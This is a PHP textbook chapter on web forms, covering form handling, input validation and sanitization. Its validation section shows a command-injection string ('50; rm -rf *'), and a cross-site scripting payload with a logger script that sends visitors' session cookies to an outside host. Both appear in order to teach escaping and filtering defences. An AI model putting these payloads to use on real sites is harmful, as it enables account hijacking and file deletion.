© Frank M. Kromann 2018
Frank M. KromannBeginning PHP and MySQLhttps://doi.org/10.1007/978-1-4302-6044-8_13

13. Forms

Frank M. Kromann1 
(1)
Aliso Viejo, CA, USA
 
You can toss around technical terms such as relational database, web services, session handling, and LDAP, but when it comes down to it, you started learning PHP because you wanted to build cool, interactive websites. After all, one of the Web’s most alluring aspects is that it’s two-way media; the Web not only enables you to publish information but also offers an effective means for obtaining input from peers, clients, and friends. This chapter introduces one of the most common ways in which you can use PHP to interact with the user: web forms. In total, I’ll show you how to use PHP and web forms to carry out the following tasks:
  • Pass data from a form to a PHP script

  • Validate form data

  • Work with multivalued form components

Before jumping into any examples, let’s begin with an introduction to how PHP is able to accept and process data submitted through a web form.

PHP and Web Forms

What makes the Web so interesting and useful is its ability to disseminate information as well as collect it, the latter of which is accomplished primarily through an HTML-based form. These forms are used to encourage site feedback, facilitate forum conversations, collect mailing and billing addresses for online orders, and much more. But coding the HTML form is only part of what’s required to effectively accept user input; a server-side component must be ready to process the input. Using PHP for this purpose is the subject of this section.

Because you’ve used forms hundreds if not thousands of times, this chapter won’t introduce form syntax. If you require a primer or a refresher course on how to create basic forms, consider reviewing any of the many tutorials available on the Web.

Instead, this chapter reviews how you can use web forms in conjunction with PHP to gather and process user data.

The first thing to think about when sending data to and from a web server is security. The HTTP protocol used by browsers is a plain text protocol. This makes it possible for any system between the server and the browser to read along and possible modify the content. Especially if you are creating a form to gather credit card information or other sensitive data, you should use a more secure way of communication to prevent this. It is relatively easy to add an SSL certificate to the server, and it can be done at no cost by using services like LetsEncrypy ( https://letsencrypt.com ). When the server has an SSL certificate installed, the communication will be done via HTTPS where the server will send a public key to the browser. This key is used to encrypt any data from the browser and decrypt data coming from the server. The server will use the matching private key to encrypt and decrypt.

There are two common methods for passing data from one script to another: GET and POST. Although GET is the default, you’ll typically want to use POST because it’s capable of handling considerably more data, an important characteristic when you’re using forms to insert and modify large blocks of text. If you use POST, any posted data sent to a PHP script must be referenced using the $_POST syntax introduced in Chapter 3. For example, suppose the form contains a text-field value named email that looks like this:
<input type="text" id="email" name="email" size="20" maxlength="40">
Once this form is submitted, you can reference that text-field value like so:
$_POST['email']
Of course, for the sake of convenience, nothing prevents you from first assigning this value to another variable, like so:
$email = $_POST['email'];

Keep in mind that other than the odd syntax, $_POST variables are just like any other variable that can be accessed and modified by the PHP script. They’re simply referenced in this fashion in an effort to definitively compartmentalize an external variable’s origination. As you learned in Chapter 3, such a convention is available for variables originating from the GET method, cookies, sessions, the server, and uploaded files.

Let’s take a look at a simple example demonstrating PHP’s ability to accept and process form data.

A Simple Example

The following script renders a form that prompts the user for his name and e-mail address. Once completed and submitted, the script (named subscribe.php) displays this information back to the browser window.
<?php
    // If the name field is filled in
    if (isset($_POST['name']))
    {
       $name = $_POST['name'];
       $email = $_POST['email'];
       printf("Hi %s! <br>", $name);
       printf("The address %s will soon be a spam-magnet! <br>", $email);
    }
?>
<form action="subscribe.php" method="post">
    <p>
        Name:<br>
        <input type="text" id="name" name="name" size="20" maxlength="40">
    </p>
    <p>
        Email Address:<br>
        <input type="text" id="email" name="email" size="20" maxlength="40">
    </p>
    <input type="submit" id="submit" name = "submit" value="Go!">
</form>
Assuming that the user completes both fields and clicks the Go! button, output similar to the following will be displayed:
Hi Bill!
The address [email protected] will soon be a spam-magnet!

In this example, the form refers to the script in which it is found, rather than another script. Although both practices are regularly employed, it’s quite commonplace to refer to the originating document and use conditional logic to determine which actions should be performed. In this case, the conditional logic dictates that the echo statements will only occur if the user has submitted (posted) the form.

In cases where you’re posting data back to the same script from which it originated, as in the preceding example, you can use the PHP superglobal variable $_SERVER['PHP_SELF'] . The name of the executing script is automatically assigned to this variable; therefore, using it in place of the actual file name will save some additional code modification should the file name later change. For example, the <form> tag in the preceding example could be modified as follows and still produce the same outcome:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

HTML used to be limited to a few basic input types, but with the introduction of HTML5 a few years back, this was changed as support for color, date, datetime-local, email, month, number, range, search, tel, time, url, and week was added. These are all options that can be used with the type attribute on the input tag. They will use specific browser logic that allows for localization and validation.

Just because browsers now support some input validation does not mean you can skip that part in the PHP script that is used to receive the input. There is no guarantee that the client is a browser. It is best practice to never trust the input that is coming into a PHP script.

Validating Form Data

In a perfect world, the preceding example would be perfectly sufficient for accepting and processing form data. The reality is that websites are under constant attack by malicious third parties from around the globe, poking and prodding the external interfaces for ways to gain access to, steal, or even destroy the website and its accompanying data. As a result, you need to take great care to thoroughly validate all user input to ensure not only that it’s provided in the desired format (for instance, if you expect the user to provide an e-mail address, then the address should be syntactically valid), but also that it is incapable of doing any harm to the website or underlying operating system.

This section shows you just how significant this danger is by demonstrating two common attacks experienced by websites whose developers have chosen to ignore this necessary safeguard. The first attack results in the deletion of valuable site files, and the second attack results in the hijacking of a random user’s identity through an attack technique known as cross-site scripting . This section concludes with an introduction to a few easy data validation solutions that will help remedy this situation.

File Deletion

To illustrate just how ugly things could get if you neglect validation of user input, suppose that your application requires that user input be passed to some sort of legacy command-line application called inventory_manager . Executing such an application by way of PHP requires use of a command execution function such as exec() or system() , (both functions were introduced in Chapter 10). The inventory_manager application accepts as input the SKU of a particular product and a recommendation for the number of products that should be reordered. For example, suppose the cherry cheesecake has been particularly popular lately, resulting in a rapid depletion of cherries. The pastry chef might use the application to order 50 more jars of cherries (SKU 50XCH67YU), resulting in the following call to inventory_manager :
$sku = "50XCH67YU";
$inventory = "50";
exec("/usr/bin/inventory_manager ".$sku." ".$inventory);
Now suppose the pastry chef has become deranged from an overabundance of oven fumes and attempts to destroy the website by passing the following string in as the recommended quantity to reorder:
50; rm -rf *
This results in the following command being executed in exec() :
exec("/usr/bin/inventory_manager 50XCH67YU 50; rm -rf *");

The inventory_manager application would indeed execute as intended but would be immediately followed by an attempt to recursively delete every file residing in the directory where the executing PHP script resides.

Cross-Site Scripting

The previous scenario demonstrates just how easily valuable site files could be deleted should user data not be filtered; however, it’s possible that damage from such an attack could be minimized by restoring a recent backup of the site and corresponding data, but it would be much better to prevent it from happening in the first place.

There’s another type of attack that is considerably more difficult to recover from—because it involves the betrayal of users who have placed trust in the security of your website. Known as cross-site scripting, this attack involves the insertion of malicious code into a page frequented by other users (e.g., an online bulletin board). Merely visiting this page can result in the transmission of data to a third-party’s site, which could allow the attacker to later return and impersonate the unwitting visitor. To demonstrate the severity of this situation, let’s configure an environment that welcomes such an attack.

Suppose that an online clothing retailer offers registered customers the opportunity to discuss the latest fashion trends in an electronic forum. In the company’s haste to bring the custom-built forum online, it decided to skip sanitization of user input, figuring it could take care of such matters at a later point in time. Because HTTP is a stateless protocol, it’s common to store values in the browser memory (Cookies) and use that data when the user interacts with the site. It is also common to store most of the data on the server site and only store a key as a cookie in the browser. This is commonly referred to as a session id. If it’s possible to gain access to the session id for different users, it will be possible for an attacker to impersonate the other users.

One unscrupulous customer attempts to retrieve the session keys (stored in cookies) of other customers in order to subsequently enter their accounts. Believe it or not, this is done with just a bit of HTML and JavaScript that can forward all forum visitors’ cookie data to a script residing on a third-party server. To see just how easy it is to retrieve cookie data, navigate to a popular website such as Yahoo! or Google and enter the following into the browser JavaScript console (part of the browser’s developer tools):
javascript:void(alert(document.cookie))
You should see all of your cookie information for that site posted to a JavaScript alert window similar to that shown in Figure 13-1.
../images/314623_5_En_13_Chapter/314623_5_En_13_Fig1_HTML.jpg
Figure 13-1

Displaying cookie information from a visit to https://www.google.com

Using JavaScript, the attacker can take advantage of unchecked input by embedding a similar command into a web page and quietly redirecting the information to some script capable of storing it in a text file or a database. The attacker then uses the forum’s comment-posting tool to add the following string to the forum page:
<script>
 document.location = 'http://www.example.org/logger.php?cookie=' +
                      document.cookie
</script>
The logger.php file might look like this:
<?php
    // Assign GET variable
    $cookie = $_GET['cookie'];
    // Format variable in easily accessible manner
    $info = "$cookie ";
    // Write information to file
    $fh = @fopen("/home/cookies.txt", "a");
    @fwrite($fh, $info);
    // Return to original site
    header("Location: http://www.example.com");
?>

If the e-commerce site isn’t comparing cookie information to a specific IP address (a safeguard that would likely be uncommon on a site that has decided to ignore data sanitization), all the attacker has to do is assemble the cookie data into a format supported by the browser, and then return to the site from which the information was culled. Chances are the attacker is now masquerading as the innocent user, potentially making unauthorized purchases, defacing the forums, and wreaking other havoc.

Modern browsers support both in-memory and http-only cookies. That makes it more difficult for an attacker to get access to the cookie values from injected JavaScript. Setting the session cookie to http-only is done by adding session.cookie_httponly = 1 to the php.ini file.

Sanitizing User Input

Given the frightening effects that unchecked user input can have on a website and its users, one would think that carrying out the necessary safeguards must be a particularly complex task. After all, the problem is so prevalent within web applications of all types, so prevention must be quite difficult, right? Ironically, preventing these types of attacks is really a trivial affair, accomplished by first passing the input through one of several functions before performing any subsequent task with it. It is important to consider what you do with input provided by a user. If it passed on as part of a database query, you should ensure that the content is treated as text or numbers and not as a database command. If handed back to the user or different users, you should make sure that no JavaScript is included with the content as this could be executed by the browser.

Four standard functions are available for doing so: escapeshellarg() , escapeshellcmd() , htmlentities() , and strip_tags() . You also have access to the native Filter extension, which offers a wide variety of validation and sanitization filters. The remainder of this section is devoted to an overview of these sanitization features.

Note

Keep in mind that the safeguards described in this section (and throughout the chapter), while effective in many situations, offer only a few of the many possible solutions at your disposal. Therefore, although you should pay close attention to what’s discussed in this chapter, you should also be sure to read as many other security-minded resources as possible to obtain a comprehensive understanding of the topic.

Websites are built with two distinct components: the server side that generates output and handles input from the user and the client side that renders HTML and other content as well as JavaScript code provided by the server. This two-tier model is the root of the security challenges. Even if all the client side code is provided by the server, there is no way to ensure that it is executed or that it is not tampered with. A user might not use a browser to interact with the server. For this reason, it is recommended to never trust any input from a client, even if you spend the time to create nice validation functions in JavaScript to make a better experience for the user that follows all your rules.

Escaping Shell Arguments

The escapeshellarg() function delimits its arguments with single quotes and escapes quotes. Its prototype follows:
string escapeshellarg(string arguments)
The effect is such that when arguments is passed to a shell command, it will be considered a single argument. This is significant because it lessens the possibility that an attacker could masquerade additional commands as shell command arguments. Therefore, in the previously described file-deletion scenario, all of the user input would be enclosed in single quotes, like so:
/usr/bin/inventory_manager '50XCH67YU' '50; rm -rf *'

Attempting to execute this would mean 50; rm -rf * would be treated by inventory_manager as the requested inventory count. Presuming inventory_manager is validating this value to ensure that it’s an integer, the call will fail and no harm will be done.

Escaping Shell Metacharacters

The escapeshellcmd() function operates under the same premise as escapeshellarg() , but it sanitizes potentially dangerous input program names rather than program arguments. Its prototype follows:
string escapeshellcmd(string command)

This function operates by escaping any shell metacharacters found in the command. These metacharacters include # & ; ` , | * ? ~ < > ^ ( ) [ ] { } $ x0A xFF.

You should use escapeshellcmd() in any case where the user’s input might determine the name of a command to execute. For instance, suppose the inventory-management application is modified to allow the user to call one of two available programs, foodinventory_manager or supplyinventory_manager , by passing along the string food or supply , respectively, together with the SKU and requested amount. The exec() command might look like this:
exec("/usr/bin/".$command."inventory_manager ".$sku." ".$inventory);
Assuming the user plays by the rules, the task will work just fine. However, consider what would happen if the user were to pass along the following as the value to $command :
blah; rm -rf *;
/usr/bin/blah; rm -rf *; inventory_manager 50XCH67YU 50
This assumes the user also passes in 50XCH67YU and 50 as the SKU and inventory number, respectively. These values don’t matter anyway because the appropriate inventory_manager command will never be invoked since a bogus command was passed in to execute the nefarious rm command. However, if this material were to be filtered through escapeshellcmd() first, $command would look like this:
blah; rm -rf *;

This means exec() would attempt to execute the command /usr/bin/blah rm -rf , which of course doesn’t exist.

Converting Input into HTML Entities

The htmlentities() function converts certain characters having special meaning in an HTML context to strings that a browser can render rather than execute them as HTML. Its prototype follows:
string htmlentities(string input [, int quote_style [, string charset]])
Five characters are considered special by this function:
  • & will be translated to &

  • " will be translated to &quot; (when quote_style is set to ENT_NOQUOTES)

  • > will be translated to >

  • < will be translated to <

  • ' will be translated to ' (when quote_style is set to ENT_QUOTES)

Returning to the cross-site scripting example, if the user’s input is first passed through htmlentities() rather than directly embedded into the page and executed as JavaScript, the input would be displayed exactly as it is input because it would be translated like so:
<scriptgt;
document.location ='http://www.example.org/logger.php?cookie=' +
                    document.cookie
</script>

Stripping Tags from User Input

Sometimes it is best to completely strip user input of all HTML input, regardless of intent. For instance, HTML-based input can be particularly problematic when the information is displayed back to the browser, as in the case of a message board. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all, and if the tags contain JavaScript it could be executed by the browser. This problem can be eliminated by passing the user input through strip_tags() , which removes all tags from a string (a tag is defined as anything that starts with the character < and ends with >). Its prototype follows:
string strip_tags(string str [, string allowed_tags])
The input parameter str is the string that will be examined for tags, while the optional input parameter allowed_tags specifies any tags that you would like to be allowed in the string. For example, italic tags (<i></i>) might be allowable, but table tags such as <td></td> could potentially wreak havoc on a page. Please note that many tags can have JavaScript code as part of the tag. That will not be removed if the tag is allowed. An example follows:
<?php
    $input = "I <td>really</td> love <i>PHP</i>!";
    $input = strip_tags($input,"<i></i>");
    // $input now equals "I really love <i>PHP</i>!"
?>

Validating and Sanitizing Data with the Filter Extension

Because data validation is such a commonplace task, the PHP development team added native validation features to the language in version 5.2. Known as the Filter extension, you can use these new features to not only validate data such as an e-mail address so it meets stringent requirements, but also to sanitize data, altering it to fit specific criteria without requiring the user to take further actions.

To validate data using the Filter extension, you’ll choose from one of many available filter and sanitize types ( http://php.net/manual/en/filter.filters.php ), even an option that allows you to write you own filter function,, passing the type and target data to the filter_var() function . For instance, to validate an e-mail address you’ll pass the FILTER_VALIDATE_EMAIL flag as demonstrated here:
$email = "john@@example.com";
if (! filter_var($email, FILTER_VALIDATE_EMAIL))
{
    echo "INVALID E-MAIL!";
}
The FILTER_VALIDATE_EMAIL identifier is just one of many validation filters currently available. The currently supported validation filters are summarized in Table 13-1.
Table 13-1

The Filter Extension’s Validation Capabilities

Target Data

Identifier

Boolean values

FILTER_VALIDATE_BOOLEAN

E-mail addresses

FILTER_VALIDATE_EMAIL

Floating-point numbers

FILTER_VALIDATE_FLOAT

Integers

FILTER_VALIDATE_INT

IP addresses

FILTER_VALIDATE_IP

MAC Address

FILTER_VALIDATE_MAC

Regular Expressions

FILTER_VALIDATE_REGEXP

URLs

FILTER_VALIDATE_URL

You can further tweak the behavior of these eight validation filters by passing flags into the filter_var() function . For instance, you can request that solely IPV4 or IPV6 IP addresses are provided by passing in the FILTER_FLAG_IPV4 or FILTER_FLAG_IPV6 flags , respectively:
$ipAddress = "192.168.1.01";
if (!filter_var($ipAddress, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6))
{
    echo "Please provide an IPV6 address!";
}

Consult the PHP documentation for a complete list of available flags.

Sanitizing Data with the Filter Extension

As I mentioned, it’s also possible to use the Filter component to sanitize data, which can be useful when processing user input intended to be posted in a forum or blog comments. For instance, to remove all tags from a string, you can use the FILTER_SANITIZE_STRING :
$userInput = "Love the site. E-mail me at <a href='http://www.example.com'>Spammer</a>.";
$sanitizedInput = filter_var($userInput, FILTER_SANITIZE_STRING);
// $sanitizedInput = Love the site. E-mail me at Spammer.
A total of 10 sanitization filters are currently supported, summarized in Table 13-2.
Table 13-2

The Filter Extension’s Sanitization Capabilities

Identifier

Purpose

FILTER_SANITIZE_EMAIL

Removes all characters from a string except those allowable within an e-mail address as defined within RFC 822 ( https://www.w3.org/Protocols/rfc822/ ).

FILTER_SANITIZE_ENCODED

URL encodes a string, producing output identical to that returned by the urlencode() function .

FILTER_SANITIZE_MAGIC_QUOTES

Escapes potentially dangerous characters with a backslash using the addslashes() function .

FILTER_SANITIZE_NUMBER_FLOAT

Removes any characters that would result in a floating-point value not recognized by PHP.

FILTER_SANITIZE_NUMBER_INT

Removes any characters that would result in an integer value not recognized by PHP.

FILTER_SANITIZE_SPECIAL_CHARS

HTML encodes the ’, ”, <, >, and & characters, in addition to any character having an ASCII value less than 32 (this includes characters such as a tab and backspace).

FILTER_SANITIZE_STRING

Strips all tags such as <p> and <b>.

FILTER_SANITIZE_STRIPPED

An alias of “string” filter.

FILTER_SANITIZE_URL

Removes all characters from a string except for those allowable within a URL as defined within RFC 3986 ( https://tools.ietf.org/html/rfc3986 ) .

FILTER_UNSAFE_RAW

Used in conjunction with various optional flags, FILTER_UNSAFE_RAW can strip and encode characters in a variety of ways.

As it does with the validation features, the Filter extension also supports a variety of flags that can be used to tweak the behavior of many sanitization identifiers. Consult the PHP documentation for a complete list of supported flags.

Working with Multivalued Form Components

Multivalued form components such as check boxes and multiple-select boxes greatly enhance your web-based data-collection capabilities because they enable the user to simultaneously select multiple values for a given form item. For example, consider a form used to gauge a user’s computer-related interests. Specifically, you would like to ask the user to indicate those programming languages that interest him. Using a few text fields along with a multiple-select box, this form might look similar to that shown in Figure 13-2.
../images/314623_5_En_13_Chapter/314623_5_En_13_Fig2_HTML.jpg
Figure 13-2

Creating a multiselect box

The HTML for the multiple-select box shown in Figure 13-1 might look like this:
<select name="languages[]" multiple="multiple">
    <option value="csharp">C#</option>
    <option value="javascript">JavaScript</option>
    <option value="perl">Perl</option>
    <option value="php" selected>PHP</option>
</select>
Because these components are multivalued, the form processor must be able to recognize that there may be several values assigned to a single form variable. In the preceding examples, note that both use the name languages to reference several language entries. How does PHP handle the matter? Perhaps not surprisingly, by considering it an array. To make PHP recognize that several values may be assigned to a single form variable, you need to make a minor change to the form item name, appending a pair of square brackets to it. Therefore, instead of languages, the name would read languages[]. Once renamed, PHP will treat the posted variable just like any other array. Consider this example:
<?php
    if (isset($_POST['submit']))
    {
        echo "You like the following languages:<br>";
        if (is_array($_POST['languages'])) {
          foreach($_POST['languages'] AS $language) {
              $language = htmlentities($language);
              echo "$language<br>";
          }
      }
    }
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
   What's your favorite programming language?<br> (check all that apply):<br>
   <input type="checkbox" name="languages[]" value="csharp">C#<br>
   <input type="checkbox" name="languages[]" value="javascript">JavaScript<br>
   <input type="checkbox" name="languages[]" value="perl">Perl<br>
   <input type="checkbox" name="languages[]" value="php">PHP<br>
   <input type="submit" name="submit" value="Submit!">
</form>
If the user chooses the languages C# and PHP, s/he is greeted with the following output:
You like the following languages:
csharp
php

Summary

One of the Web’s great strengths is the ease with which it enables us to not only disseminate but also compile and aggregate user information. However, as developers, this means that we must spend an enormous amount of time building and maintaining a multitude of user interfaces, many of which are complex HTML forms. The concepts described in this chapter should enable you to decrease that time a tad.

In addition, this chapter offered a few commonplace strategies for improving your application’s general user experience. Although not an exhaustive list, perhaps the material presented in this chapter will act as a springboard for you to conduct further experimentation while decreasing the time that you invest in what is surely one of the more time-consuming aspects of web development: improving the user experience.

The next chapter shows you how to protect the sensitive areas of your website by forcing users to supply a username and password prior to entry.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.135.183.1